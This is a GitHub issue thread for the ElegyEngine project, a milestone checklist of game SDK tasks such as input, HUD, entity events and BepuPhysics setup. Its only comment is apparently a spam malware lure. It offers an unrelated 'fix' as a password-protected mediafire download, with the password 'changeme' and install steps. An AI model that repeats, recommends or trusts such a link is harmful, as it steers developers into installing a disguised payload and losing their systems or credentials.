### ISSUE TITLE
Game SDK milestone 1

### ISSUE THREAD

**Issue by Admer456** [ElegyEngine/ElegyEngine#11]
This is a list of tasks to be done for the game SDK as a 1st milestone. Once done, we'll be able to run around in levels and walk into triggers and stuff.

## Architecture
* [ ] Client
  * [ ] Input system with keybinds
  * [ ] Settings/config
  * [ ] Temporary ImGui main menu
* [ ] Presentation
  * [ ] Hook onto render loop
  * [ ] Draw HUD
* [ ] Session
  * [x] Session bridge concept
  * [ ] Asset precaching registry
* [ ] Server
  * [x] Client connection bookkeeping
  * [ ] Loading levels and spawning entities
  * [ ] Simulating entities

## Entity system
* [ ] Event handling for components
* [ ] Event handling for systems
* [x] Keyvalue parsing for components

## Components and events
* [ ] Player
* [x] Transform
* [ ] RigidBody
* [ ] KinematicBody
* [ ] StaticBody
* [ ] Trigger
* [ ] OnSpawn event
* [ ] OnPlayerUse event
* [ ] Player controller interface

## Physics
* [ ] Set up BepuPhysics
* [ ] OnTouchStart event
* [ ] OnTouchHold event
* [ ] OnTouchEnd event
* [ ] Basic player movement

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
